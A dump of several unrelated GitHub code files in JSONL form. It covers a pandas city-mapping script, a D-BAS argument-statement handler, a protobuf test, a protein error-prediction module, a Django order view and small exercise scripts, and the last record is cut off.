probabilities.argmax(1).reshape([-1, 1])\n return (probabilities[..., 1] >= self.threshold).astype(np.int).reshape([-1, 1])\n\n\n__all__ = [\"StrMixin\", \"NormalizeMixin\", \"BinaryClassifierMixin\"]\n","repo_name":"carefree0910/carefree-ml","sub_path":"cfml/models/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"8681548210","text":"### Note:\n\n# What does this function do?: \n\n## Every Online consultation happening in Bangalore, Chennai, Hyderabad and Pune are not being recorded with City names. \n## But rather they are being recorded with City name called \"Online\"\n## In this Code we try to map these \"Online\" with corresponding city names based on the online consulation location.\n\n## Assumption: Person is from the same place as the Online consultion location suggests.\n\n## Example: A person living in Madurai can do online consultation with a doctor from Chennai. This gets recorded as \"Online consultation-Chennai\"\n# We assume the person is not from Madurai\n\nimport pandas as pd\nimport Apts_cities_mapping\n\ndef Online_cities_mapping():\n\n Apts = Apts_cities_mapping.Apts_cities_mapping()\n\n Apts_half1 = Apts[Apts.City!=\"Online\"]\n Apts_half2 = Apts[Apts.City==\"Online\"]\n\n Online_mapping = pd.read_csv(r\"D:\\Python\\Test\\Mapping\\Cities mapping\\Online_hospitals_mapping.csv\")\n\n Online_mapped = pd.merge(Apts_half2, Online_mapping, left_on = \"f2f_hospital\", right_on = \"Online_hospitals\", how = \"left\")\n\n Online_mapped = Online_mapped.drop(columns = [\"City_x\", \"Online_hospitals\"])\n\n Online_mapped.columns = ['Lead_id', 'f2f_doctor', 'f2f_hospital', 'f2f_sch_date', 'f2f_sch_time',\n 'f2f_comp_date', 'f2f_comp_time', 'Surgery_doctor', 'Surgery_hospital',\n 'Surgery_sch_date', 'Surgery_sch_time', 'Surgery_comp_date',\n 'Surgery_comp_time', 'Doctor_id', 'Hospital_id', 'Service', 'Owner',\n 'Lead_src', 'Status', 'Surgeon_id', 'Surg_hospital_id',\n 'Surgery_amount', 'Insurance_amount', 'Copay_amount', 'Cash_amount',\n 'Discount', 'Final_amount', 'Dept', 'Surgery_required_date',\n 'Surgery_required_time', 'Call_src','City']\n \n Apts_online_mapped = pd.concat([Apts_half1, Online_mapped], axis = 0, ignore_index = True)\n\n return Apts_online_mapped\n\n\n\n\n","repo_name":"krishnaRkishore/Marketing_Analytics","sub_path":"Codes/Online_cities_mapping.py","file_name":"Online_cities_mapping.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10473072009","text":"# coding=utf-8\nfrom os import environ\nfrom typing import List, Tuple, Dict, Union, Any\n\nimport transaction\nfrom sqlalchemy import func\n\nimport dbas.review.helper.queues as review_queue_helper\nfrom dbas.database import DBDiscussionSession\nfrom dbas.database.discussion_model import Issue, User, Statement, TextVersion, MarkedStatement, \\\n sql_timestamp_pretty_print, Argument, Premise, PremiseGroup, SeenStatement\nfrom dbas.handler import user, notification as nh\nfrom dbas.handler.rss import append_action_to_issue_rss\nfrom dbas.handler.voting import add_seen_argument, add_seen_statement\nfrom dbas.helper.relation import set_new_undermine_or_support_for_pgroup, set_new_support, set_new_undercut, \\\n set_new_rebut\nfrom dbas.helper.url import UrlManager\nfrom dbas.input_validator import is_integer\nfrom dbas.lib import get_text_for_statement_uid, get_profile_picture, escape_string, get_text_for_argument_uid, \\\n Relations, Attitudes\nfrom dbas.logger import logger\nfrom dbas.review.helper.reputation import add_reputation_for, rep_reason_first_position, \\\n rep_reason_first_justification, rep_reason_new_statement\nfrom dbas.strings.keywords import Keywords as _\nfrom dbas.strings.translator import Translator\nfrom websocket.lib import send_request_for_info_popup_to_socketio\n\n\ndef set_position(db_user: User, db_issue: Issue, statement_text: str) -> dict:\n \"\"\"\n Set new position for current discussion and returns collection with the next url for the discussion.\n\n :param statement_text: The text of the new position statement.\n :param db_issue: The issue which gets the new position\n :param db_user: The user who sets the new position.\n :rtype: dict\n :return: Prepared collection with statement_uids of the new positions and next url or an error\n \"\"\"\n logger('StatementsHelper', statement_text)\n\n user.update_last_action(db_user)\n\n new_statement = insert_as_statement(statement_text, db_user, db_issue, is_start=True)\n\n _um = UrlManager(db_issue.slug)\n url = _um.get_url_for_statement_attitude(new_statement.uid)\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_first_position)\n if not add_rep:\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_new_statement)\n # send message if the user is now able to review\n if broke_limit:\n url += '#access-review'\n\n return {\n 'status': 'success',\n 'url': 'url',\n 'statement_uids': [new_statement.uid],\n 'error': ''\n }\n\n\ndef set_positions_premise(db_issue: Issue, db_user: User, db_conclusion: Statement, premisegroups: List[List[str]],\n supportive: bool, history: str, mailer) -> dict:\n \"\"\"\n Set new premise for a given position and returns dictionary with url for the next step of the discussion\n\n :param mailer:\n :param history:\n :param supportive:\n :param premisegroups:\n :param db_conclusion:\n :param db_user:\n :param db_issue:\n :rtype: dict\n :return: Prepared collection with statement_uids of the new premises and an url or an error\n \"\"\"\n user.update_last_action(db_user)\n\n prepared_dict = __process_input_of_start_premises(premisegroups, db_conclusion, supportive, db_issue, db_user)\n if prepared_dict['error']:\n return prepared_dict\n\n __set_url_of_start_premises(prepared_dict, db_conclusion, supportive, db_issue, db_user, history, mailer)\n __add_reputation(db_user, db_issue, prepared_dict['url'], prepared_dict)\n\n return prepared_dict\n\n\ndef __add_reputation(db_user: User, db_issue: Issue, url: str, prepared_dict: dict):\n \"\"\"\n\n :param db_user:\n :param db_issue:\n :param url:\n :param prepared_dict:\n :return:\n \"\"\"\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_first_justification)\n if not add_rep:\n add_rep, broke_limit = add_reputation_for(db_user, rep_reason_new_statement)\n # send message if the user is now able to review\n if broke_limit:\n _t = Translator(db_issue.lang)\n send_request_for_info_popup_to_socketio(db_user.nickname, _t.get(_.youAreAbleToReviewNow), '/review')\n prepared_dict['url'] = '{}{}'.format(url, '#access-review')\n\n\ndef set_correction_of_statement(elements, db_user, translator) -> dict:\n \"\"\"\n Adds a proposal for a statements correction and returns info if the proposal could be set\n\n :param elements: List of dicts with text and uids for proposals of edits for new statements\n :param db_user: User\n :param translator: Translator\n :rtype: dict\n :return: Dictionary with info and/or error\n \"\"\"\n prepared_dict = dict()\n db_user.update_last_action()\n\n msg, error = review_queue_helper.add_proposals_for_statement_corrections(elements, db_user, translator)\n prepared_dict['error'] = msg if error else ''\n prepared_dict['info'] = msg if len(msg) > 0 else ''\n\n return prepared_dict\n\n\ndef set_seen_statements(uids, path, db_user) -> dict:\n \"\"\"\n Marks several statements as already seen.\n\n :param uids: Uids of statements which should be marked as seen\n :param path: Current path of the user\n :param db_user: User\n :rtype: dict\n :return: Dictionary with an error field\n \"\"\"\n # are the statements connected to an argument?\n if 'justify' in path:\n url = path[path.index('justify/') + len('justify/'):]\n additional_argument = int(url[:url.index('/')])\n add_seen_argument(additional_argument, db_user)\n\n for uid in uids:\n # we get the premise group id's only\n if is_integer(uid):\n add_seen_statement(uid, db_user)\n return {'status': 'success'}\n\n\ndef correct_statement(db_user, uid, corrected_text):\n \"\"\"\n Corrects a statement\n\n :param db_user: User requesting user\n :param uid: requested statement uid\n :param corrected_text: new text\n :return: dict()\n \"\"\"\n logger('StatementsHelper', 'def ' + str(uid))\n\n while corrected_text.endswith(('.', '?', '!')):\n corrected_text = corrected_text[:-1]\n\n # duplicate check\n return_dict = dict()\n db_statement = DBDiscussionSession.query(Statement).get(uid)\n db_textversion = DBDiscussionSession.query(TextVersion).filter_by(content=corrected_text).order_by(\n TextVersion.uid.desc()).all()\n\n # not a duplicate?\n if not db_textversion:\n textversion = TextVersion(content=corrected_text, author=db_user.uid)\n textversion.set_statement(db_statement.uid)\n DBDiscussionSession.add(textversion)\n DBDiscussionSession.flush()\n\n # if request:\n # nh.send_edit_text_notification(db_user, textversion, url, request)\n\n # transaction.commit() # # 207\n\n return_dict['uid'] = uid\n return_dict['text'] = corrected_text\n return return_dict\n\n\ndef get_logfile_for_statements(uids, lang, main_page):\n \"\"\"\n Returns the logfile for the given statement uid\n\n :param uids: requested statement uid\n :param lang: ui_locales ui_locales\n :param main_page: URL\n :return: dictionary with the logfile-rows\n \"\"\"\n logger('StatementsHelper', 'def with uid: ' + str(uids))\n\n main_dict = dict()\n for uid in uids:\n db_textversions = DBDiscussionSession.query(TextVersion).filter_by(statement_uid=uid).order_by(\n TextVersion.uid.asc()).all() # TODO #432\n if len(db_textversions) == 0:\n continue\n return_dict = dict()\n content_dict = dict()\n # add all corrections\n for index, version in enumerate(db_textversions):\n content_dict[str(index)] = __get_logfile_dict(version, main_page, lang)\n return_dict['content'] = content_dict\n main_dict[get_text_for_statement_uid(uid)] = return_dict\n\n return main_dict\n\n\ndef __get_logfile_dict(textversion: TextVersion, main_page: str, lang: str) -> Dict:\n \"\"\"\n Returns dictionary with information about the given textversion\n\n :param textversion: TextVersion\n :param main_page: String\n :param lang: Language.ui_locales\n :return: dict()\n \"\"\"\n db_author = DBDiscussionSession.query(User).get(textversion.author_uid)\n corr_dict = dict()\n corr_dict['uid'] = str(textversion.uid)\n corr_dict['author'] = str(db_author.global_nickname)\n corr_dict['author_url'] = main_page + '/user/' + str(db_author.uid)\n corr_dict['author_gravatar'] = get_profile_picture(db_author, 20)\n corr_dict['date'] = sql_timestamp_pretty_print(textversion.timestamp, lang)\n corr_dict['text'] = str(textversion.content)\n return corr_dict\n\n\ndef insert_as_statement(text: str, db_user: User, db_issue: Issue, is_start=False) -> Statement:\n \"\"\"\n Inserts the given text as statement and returns the uid\n\n :param text: String\n :param db_user: User\n :param db_issue: Issue\n :param is_start: Boolean\n :return: Statement\n \"\"\"\n new_statement, is_duplicate = set_statement(text, db_user, is_start, db_issue)\n\n # add marked statement\n DBDiscussionSession.add(MarkedStatement(statement=new_statement.uid, user=db_user.uid))\n DBDiscussionSession.add(SeenStatement(statement_uid=new_statement.uid, user_uid=db_user.uid))\n DBDiscussionSession.flush()\n\n _tn = Translator(db_issue.lang)\n _um = UrlManager(db_issue.slug)\n append_action_to_issue_rss(db_issue=db_issue, db_author=db_user,\n title=_tn.get(_.positionAdded if is_start else _.statementAdded),\n description='...' + get_text_for_statement_uid(new_statement.uid) + '...',\n url=_um.get_url_for_statement_attitude(new_statement.uid))\n\n return new_statement\n\n\ndef set_statement(text: str, db_user: User, is_start: bool, db_issue: Issue) -> Tuple[Statement, bool]:\n \"\"\"\n Saves statement for user\n\n :param text: given statement\n :param db_user: User of given user\n :param is_start: if it is a start statement\n :param db_issue: Issue\n :return: Statement, is_duplicate or -1, False on error\n \"\"\"\n\n logger('StatementsHelper', 'user: ' + str(db_user.nickname) + ', user_id: ' + str(db_user.uid) +\n ', text: ' + str(text) + ', issue: ' + str(db_issue.uid))\n\n # escaping and cleaning\n text = text.strip()\n text = ' '.join(text.split())\n text = escape_string(text)\n _tn = Translator(db_issue.lang)\n if text.startswith(_tn.get(_.because).lower() + ' '):\n text = text[len(_tn.get(_.because) + ' '):]\n while text.endswith(('.', '?', '!', ',')):\n text = text[:-1]\n\n # check, if the text already exists\n db_duplicate = DBDiscussionSession.query(TextVersion).filter(\n func.lower(TextVersion.content) == text.lower()).first()\n if db_duplicate:\n db_statement = DBDiscussionSession.query(Statement).filter(Statement.uid == db_duplicate.statement_uid,\n Statement.issue_uid == db_issue.uid).one()\n return db_statement, True\n\n # add text\n statement = Statement(is_position=is_start, issue=db_issue.uid)\n DBDiscussionSession.add(statement)\n DBDiscussionSession.flush()\n\n # add textversion\n textversion = TextVersion(content=text, author=db_user.uid, statement_uid=statement.uid)\n DBDiscussionSession.add(textversion)\n DBDiscussionSession.flush()\n\n transaction.commit()\n return statement, False\n\n\ndef __is_conclusion_in_premisegroups(premisegroups: list, db_conclusion: Statement) -> bool:\n for premisegroup in premisegroups:\n if any([db_conclusion.get_textversion().content.lower() in pg.lower() for pg in premisegroup]):\n return True\n return False\n\n\ndef __process_input_of_start_premises(premisegroups, db_conclusion: Statement, supportive, db_issue: Issue,\n db_user: User) -> Dict[str, Any]:\n \"\"\"\n Inserts premises of groups as new arguments in dependence of the input parameters and returns a URL for forwarding.\n\n :param premisegroups: [[String, ..], ...]\n :param db_conclusion: Statement\n :param supportive: Boolean\n :param db_issue: Issue\n :param db_user: User\n :return: URL, [Statement.uid], String\n \"\"\"\n logger('StatementsHelper', '__process_input_of_start_premises: {}'.format(len(premisegroups)))\n _tn = Translator(db_issue.lang)\n\n # insert all premise groups into our database\n # all new arguments are collected in a list\n new_argument_uids = []\n new_statement_uids = [] # all statement uids are stored in this list to create the link to a possible reference\n if __is_conclusion_in_premisegroups(premisegroups, db_conclusion):\n return {\n 'argument_uids': new_argument_uids,\n 'statement_uids': new_statement_uids,\n 'error': _tn.get(_.premiseAndConclusionAreEqual)\n }\n\n for premisegroup in premisegroups: # premise groups is a list of lists\n new_argument, statement_uids = __create_argument_by_raw_input(db_user, premisegroup, db_conclusion, supportive,\n db_issue)\n\n new_argument_uids.append(new_argument.uid)\n new_statement_uids.append(statement_uids)\n\n error = None\n if len(new_argument_uids) == 0:\n a = _tn.get(_.notInsertedErrorBecauseEmpty)\n b = _tn.get(_.minLength)\n c = environ.get('MIN_LENGTH_OF_STATEMENT', 10)\n error = '{} ({}: {})'.format(a, b, c)\n\n return {\n 'argument_uids': new_argument_uids,\n 'statement_uids': new_statement_uids,\n 'error': error\n }\n\n\ndef __set_url_of_start_premises(prepared_dict: dict, db_conclusion: Statement, supportive: bool, db_issue: Issue,\n db_user: User, history, mailer):\n logger('StatementsHelper', '__receive_urls_of_start_premises')\n\n # arguments=0: empty input\n # arguments=1: deliver new url\n # arguments>1: deliver url where the user has to choose between her inputs\n _um = UrlManager(db_issue.slug, history)\n _main_um = UrlManager(db_issue.slug, history=history)\n new_argument_uids = prepared_dict['argument_uids']\n\n if len(new_argument_uids) == 1:\n url = _um.get_url_for_new_argument(new_argument_uids)\n\n else:\n pgroups = [DBDiscussionSession.query(Argument).get(arg_uid).premisegroup_uid for arg_uid in new_argument_uids]\n url = _um.get_url_for_choosing_premisegroup(False, supportive, db_conclusion.uid, pgroups)\n\n # send notifications and mails\n email_url = _main_um.get_url_for_justifying_statement(db_conclusion.uid, Attitudes.AGREE if supportive else Attitudes.DISAGREE)\n nh.send_add_text_notification(email_url, db_conclusion.uid, db_user, mailer)\n\n prepared_dict['url'] = url\n\n\ndef insert_new_premises_for_argument(premisegroup: List[str], current_attack, arg_uid, db_issue: Issue, db_user: User):\n \"\"\"\n Creates premises for a given argument\n\n :param premisegroup: List of strings\n :param current_attack: String\n :param arg_uid: Argument.uid\n :param db_issue: Issue\n :param db_user: User\n :return: Argument\n \"\"\"\n logger('StatementsHelper', 'def {}'.format(arg_uid))\n\n statements = []\n for premise in premisegroup:\n statement = insert_as_statement(premise, db_user, db_issue)\n statements.append(statement)\n\n # set the new statements as premise group and get current user as well as current argument\n new_pgroup = set_statements_as_new_premisegroup(statements, db_user, db_issue)\n current_argument = DBDiscussionSession.query(Argument).get(arg_uid)\n\n new_argument = None\n if current_attack == Relations.UNDERMINE:\n new_argument = set_new_undermine_or_support_for_pgroup(new_pgroup.uid, current_argument, False, db_user,\n db_issue)\n\n elif current_attack == Relations.SUPPORT:\n new_argument, duplicate = set_new_support(new_pgroup.uid, current_argument, db_user, db_issue)\n\n elif current_attack == Relations.UNDERCUT:\n new_argument, duplicate = set_new_undercut(new_pgroup.uid, current_argument, db_user, db_issue)\n\n elif current_attack == Relations.REBUT:\n new_argument, duplicate = set_new_rebut(new_pgroup.uid, current_argument, db_user, db_issue)\n\n if not new_argument:\n logger('StatementsHelper', 'No statement or any premise = conclusion')\n return Translator(db_issue.lang).get(_.premiseAndConclusionAreEqual)\n\n logger('StatementsHelper', 'Returning argument ' + str(new_argument.uid))\n return new_argument\n\n\ndef set_statements_as_new_premisegroup(statements: List[Statement], db_user: User, db_issue: Issue):\n \"\"\"\n Set the given statements together as new premise group\n\n :param statements: [Statement]\n :param db_user: User\n :param db_issue: Issue\n :return: PremiseGroup.uid\n \"\"\"\n logger('StatementsHelper', 'user: ' + str(db_user.uid) +\n ', statement: ' + str([s.uid for s in statements]) + ', issue: ' + str(db_issue.uid))\n # check for duplicate\n all_groups = []\n for statement in statements:\n # get the premise\n db_premise = DBDiscussionSession.query(Premise).filter_by(statement_uid=statement.uid).first()\n if db_premise:\n # getting all groups, where the premise is member\n db_premisegroup = DBDiscussionSession.query(Premise).filter_by(\n premisegroup_uid=db_premise.premisegroup_uid).all()\n groups = set()\n for group in db_premisegroup:\n groups.add(group.premisegroup_uid)\n all_groups.append(groups)\n # if every set in this array has one common member, they are all in the same group\n if len(all_groups) > 0:\n intersec = set.intersection(*all_groups)\n for group in intersec:\n db_premise = DBDiscussionSession.query(Premise).filter_by(premisegroup_uid=group).all()\n if len(db_premise) == len(statements):\n return DBDiscussionSession.query(PremiseGroup).get(group)\n\n premise_group = PremiseGroup(author=db_user.uid)\n DBDiscussionSession.add(premise_group)\n DBDiscussionSession.flush()\n\n premise_list = []\n for statement in statements:\n premise = Premise(premisesgroup=premise_group.uid, statement=statement.uid, is_negated=False,\n author=db_user.uid, issue=db_issue.uid)\n premise_list.append(premise)\n\n DBDiscussionSession.add_all(premise_list)\n DBDiscussionSession.flush()\n\n db_premisegroup = DBDiscussionSession.query(PremiseGroup).filter_by(author_uid=db_user.uid).order_by(\n PremiseGroup.uid.desc()).first()\n\n return db_premisegroup\n\n\ndef __create_argument_by_raw_input(db_user: User, premisegroup: [str], db_conclusion: Statement, is_supportive,\n db_issue: Issue) \\\n -> Tuple[Union[Argument, None], List[int]]:\n \"\"\"\n Consumes the input to create a new argument\n\n :param db_user: User\n :param premisegroup: String\n :param db_conclusion: Statement\n :param is_supportive: Boolean\n :param db_issue: Issue\n :return:\n \"\"\"\n logger('StatementsHelper',\n 'main with premisegroup {} as premisegroup, conclusion {} in issue {}'.format(premisegroup,\n db_conclusion.uid,\n db_issue.uid))\n\n new_statements = []\n\n for text in premisegroup:\n statement = insert_as_statement(text, db_user, db_issue)\n new_statements.append(statement)\n\n # second, set the new statements as premisegroup\n new_premisegroup = set_statements_as_new_premisegroup(new_statements, db_user, db_issue)\n logger('StatementsHelper', 'new pgroup ' + str(new_premisegroup.uid))\n\n # third, insert the argument\n new_argument = __create_argument_by_uids(db_user, new_premisegroup.uid, db_conclusion.uid, None, is_supportive,\n db_issue)\n transaction.commit()\n\n if new_argument:\n _tn = Translator(db_issue.lang)\n _um = UrlManager(db_issue.slug)\n append_action_to_issue_rss(db_issue=db_issue, db_author=db_user, title=_tn.get(_.argumentAdded),\n description='...' + get_text_for_argument_uid(new_argument.uid,\n anonymous_style=True) + '...',\n url=_um.get_url_for_justifying_statement(new_argument.uid, Attitudes.DONT_KNOW))\n\n return new_argument, [s.uid for s in new_statements]\n\n\ndef __create_argument_by_uids(db_user: User, premisegroup_uid, conclusion_uid, argument_uid, is_supportive,\n db_issue: Issue) -> Union[Argument, None]:\n \"\"\"\n Connects the given id's to a new argument\n\n :param db_user: User.nickname\n :param premisegroup_uid: PremiseGroup.uid\n :param conclusion_uid: Statement.uid\n :param argument_uid: Argument.uid\n :param is_supportive: Boolean\n :param db_issue: Issue\n :return:\n \"\"\"\n logger('StatementsHelper', 'main with user: ' + str(db_user.nickname) +\n ', premisegroup_uid: ' + str(premisegroup_uid) +\n ', conclusion_uid: ' + str(conclusion_uid) +\n ', argument_uid: ' + str(argument_uid) +\n ', is_supportive: ' + str(is_supportive) +\n ', issue: ' + str(db_issue.uid))\n\n new_argument = DBDiscussionSession.query(Argument).filter(Argument.premisegroup_uid == premisegroup_uid,\n Argument.is_supportive == is_supportive,\n Argument.conclusion_uid == conclusion_uid,\n Argument.issue_uid == db_issue.uid).first()\n if not new_argument:\n new_argument = Argument(premisegroup=premisegroup_uid, is_supportive=is_supportive, author=db_user.uid,\n issue=db_issue.uid, conclusion=conclusion_uid)\n new_argument.set_conclusions_argument(argument_uid)\n\n DBDiscussionSession.add(new_argument)\n DBDiscussionSession.flush()\n\n # TODO This should be redundant code! new_argument should be the new argument\n new_argument = DBDiscussionSession.query(Argument).filter(Argument.premisegroup_uid == premisegroup_uid,\n Argument.is_supportive == is_supportive,\n Argument.author_uid == db_user.uid,\n Argument.conclusion_uid == conclusion_uid,\n Argument.argument_uid == argument_uid,\n Argument.issue_uid == db_issue.uid).first()\n transaction.commit()\n if new_argument:\n logger('StatementsHelper', 'argument was inserted')\n return new_argument\n else:\n logger('StatementsHelper', 'argument was not inserted')\n return None\n","repo_name":"wahello/mirror","sub_path":"dbas/handler/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":23183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6929276763","text":"# -*- coding:utf-8 -*-\nfrom proto.pb.hello_pb2 import HelloMessage\n\n\ndef test_hell_message():\n hello = HelloMessage(title=\"title\", content=\"this is content\")\n print(hello)\n\n print(\"===\" * 10)\n data = hello.SerializeToString()\n print(data)\n\n hello2 = HelloMessage()\n hello2.ParseFromString(data)\n print(hello2)\n\n\nif __name__ == \"__main__\":\n test_hell_message()\n","repo_name":"codelieche/microservice.py","sub_path":"grpcdemo/demo/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21203299242","text":"import numpy as np\nimport os\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR)\nimport time\nfrom .resnet import *\nfrom .model import *\nfrom .deepLearningUtils import *\n\n# Loads in files for one prediction\ndef getData(tmp, outfolder, distogram):\n data = np.load(tmp)\n \n # 3D information\n idx = data[\"idx\"]\n val = data[\"val\"]\n \n # 1D information\n angles = np.stack([np.sin(data[\"phi\"]), np.cos(data[\"phi\"]), np.sin(data[\"psi\"]), np.cos(data[\"psi\"])], axis=-1)\n obt = data[\"obt\"].T\n prop = data[\"prop\"].T\n \n # 2D information\n orientations = np.stack([data[\"omega6d\"], data[\"theta6d\"], data[\"phi6d\"]], axis=-1)\n orientations = np.concatenate([np.sin(orientations), np.cos(orientations)], axis=-1)\n maps = data[\"maps\"]\n tbt = data[\"tbt\"].T\n sep = seqsep(tbt.shape[0])\n \n # Transformation\n tbt[:,:,0] = transfomer(tbt[:,:,0])\n maps = transfomer(maps)\n\n return (idx, val),\\\n np.concatenate([angles, obt, prop], axis=-1),\\\n np.concatenate([tbt, maps, orientations, sep, distogram], axis=-1)\n \n# Sequence separtion features\ndef seqsep(psize, normalizer=100, axis=-1):\n ret = np.ones((psize, psize))\n for i in range(psize):\n for j in range(psize):\n ret[i,j] = abs(i-j)*1.0/100-1.0\n return np.expand_dims(ret, axis)\n\ndef transfomer(X, cutoff=6, scaling=3.0):\n X_prime = np.maximum(X, np.zeros_like(X) + cutoff) - cutoff\n return np.arcsinh(X_prime)/scaling\n\ndef getDistribution(outfolder):\n path = outfolder\n tbts = [np.load(path+\"/\"+f)[\"tbt\"][0,:,:] for f in os.listdir(path) if isfile(join(path,f)) and \".features.npz\" in f]\n for i in range(len(tbts)-1):\n if not tbts[i].shape == tbts[i+1].shape:\n print(\"All pdbs in the input folder need to have the same size.\")\n tbt = np.array(tbts)\n transformed = transfomer(tbt, cutoff=6, scaling=1.0)\n digitization = np.arange(0.25,5.1,0.25)\n binned = np.eye(len(digitization)+1)[np.digitize(transformed, digitization)]\n normalized = np.sum(binned, axis=0)/tbt.shape[0]\n np.save(join(outfolder, \"dist.npy\"), normalized)\n \ndef predict(samples, distogram, modelpath, outfolder, verbose=False, transpose=False):\n n_models = 2 \n for i in range(1, n_models):\n modelname = modelpath+\"_rep\"+str(i)\n if verbose: print(\"Loading\", modelname)\n \n model = Model(obt_size=70,\n tbt_size=58,\n prot_size=None,\n num_chunks=5,\n optimizer=\"adam\",\n mask_weight=0.33,\n lddt_weight=10.0,\n name=modelname,\n verbose=False)\n model.load()\n \n for j in range(len(samples)):\n if verbose: print(\"Predicting for\", samples[j], \"(network rep\"+str(i)+\")\") \n tmp = join(outfolder, samples[j]+\".features.npz\")\n batch = getData(tmp, outfolder, distogram)\n lddt, estogram, mask = model.predict2(batch)\n if transpose:\n estogram = (estogram + np.transpose(estogram, [1,0,2]))/2\n mask = (mask + mask.T)/2\n np.savez_compressed(join(outfolder, samples[j]+\".npz\"),\n lddt = lddt,\n estogram = estogram,\n mask = mask)\n \ndef merge(samples, outfolder, verbose=False):\n for j in range(len(samples)):\n if verbose: print(\"Merging\", samples[j])\n\n lddt = []\n estogram = []\n mask = []\n for i in range(1,5):\n temp = np.load(join(outfolder, samples[j]+\".rep\"+str(i)+\".npz\"))\n lddt.append(temp[\"lddt\"])\n estogram.append(temp[\"estogram\"])\n mask.append(temp[\"mask\"])\n\n # Averaging\n lddt = np.mean(lddt, axis=0)\n estogram = np.mean(estogram, axis=0)\n mask = np.mean(mask, axis=0)\n\n # Saving\n np.savez_compressed(join(outfolder, samples[j]+\".npz\"),\n lddt = lddt,\n estogram = estogram,\n mask = mask)\n \ndef clean(samples, outfolder, verbose=False):\n for i in range(len(samples)):\n if verbose: print(\"Removing\", join(outfolder, samples[i]+\".features.npz\"))\n os.remove(join(outfolder, samples[i]+\".features.npz\"))\n","repo_name":"RosettaCommons/RoseTTAFold","sub_path":"DAN-msa/pyErrorPred/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":1838,"dataset":"github-code","pt":"40"} +{"seq_id":"32743832179","text":"\r\n\r\n# Write a program which accept one number form user and return addition of its factors.\r\n\r\ndef Factors(x):\r\n for i in range(1, x+1):\r\n if x % i == 0:\r\n print(i)\r\n\r\nx = int(input(\"Enter the number : \")) \r\n#print(Factors(x))\r\n\r\nFactors(x)","repo_name":"renukas99/Python_Assignments","sub_path":"Assignment2/Assignment2_4.py","file_name":"Assignment2_4.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19994507236","text":"from decimal import Decimal\n\nfrom rest_framework.response import Response\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom django_redis import get_redis_connection\n\nfrom goods.models import SKU\n\nfrom .serializers import OrderSettlementSerializer, CommitOrderSerializer\n\n\nclass CommitOrderView(CreateAPIView):\n \"\"\"商品生成订单\"\"\"\n permission_classes = [IsAuthenticated]\n serializer_class = CommitOrderSerializer\n\n\nclass OrderSettlementView(APIView):\n \"\"\"订单结算\"\"\"\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n redis_conn = get_redis_connection('cart')\n redis_cart = redis_conn.hgetall('cart_%d' % user.id)\n cart_selected = redis_conn.smembers('selected_%d' % user.id)\n cart = {}\n for sku_id in cart_selected:\n cart[int(sku_id)] = int(redis_cart[sku_id]) # {'商品ID','商品数量'}\n skus = SKU.objects.filter(id__in=cart.keys())\n for sku in skus:\n sku.count = cart[sku.id]\n freight = Decimal('10.00')\n serializer = OrderSettlementSerializer({'freight': freight, 'skus': skus})\n return Response(serializer.data)\n","repo_name":"YiZhang-You/meiduo","sub_path":"meiduo_mall/meiduo_mall/apps/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1487842696","text":"#parsing\nlines = []\nfor line in sys.stdin:\n\tlines.append(line.rstrip('\\n'))\nl, L = map(int, lines[0].split())\ngrid = []\nfor i in range(l):\n grid.append(lines[i + 1])\nsumkept = 0\ncoordskept = \"\"\n#on parcourt tout le paysage\nfor i in range(l-2):\n for j in range(L-2):\n sum=0\n\t\t#on calcul le score pour chaque photo 3 par 3\n for a in range(3):\n for b in range(3):\n if grid[i+a][j+b]==\"X\":\n sum+=1\n\t\t#si le score est maximal, on le garde en mémoire\n if sum >= sumkept:\n sumkept = sum\n coordskept = str(i + 1)+\" \"+ str(j + 1)\n \n#On affiche les coordonnées pour lesquelles on avait le score maximal\nprint(coordskept)\n","repo_name":"INSAlgo/INSAlgo-2021-2022","sub_path":"Séance 04 - 02 nov - Retours CodingBattle/CB2021-Solution-3.py","file_name":"CB2021-Solution-3.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"fr","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"72407646840","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\n 说明:本文件的目的是将训练数据的标签,按照与X相同的扩展方式\n 进行对应扩展.\n 结果:将promote之后的训练数据写出到文件中\n\n'''\n\nimport pandas as pd\n\n#**************************************************************读入数据************************************************************#\nindex = ['unit','cycle','feature_in','feature_de','feature_mix']\nindex2 = ['RUL']\nindex3 = ['unit','cycle'] \nnew_features_3_train = pd.read_table('new_features_3_train.txt',delim_whitespace=True,header=None,names=index,encoding='utf-8')\ntrain_y_FD001 = pd.read_table('train_y_FD001.txt',delim_whitespace=True,header=None,names=index2,encoding='utf-8') \nunit_cycle = new_features_3_train.loc[:,index3]\n\ntrain_y = pd.concat([unit_cycle,train_y_FD001],axis=1)\ntrain_y_copy = train_y.copy() # 直接复制一份原数据,在操作的过程中,向这个副本中插入新增数据,并且使用浅拷贝模式,避免\n # 在向副本中插入数据时原数据也被同样修改.\n\n\n#***********************************************************定义计算y的函数********************************************************#\ndef compute_y(x,k):\n if x>k:\n return int(x-k)\n else:\n print(\"the cycle number is less than k !\")\n\n\n#***********************************************************进行promote操作********************************************************#\n\nlast_row = 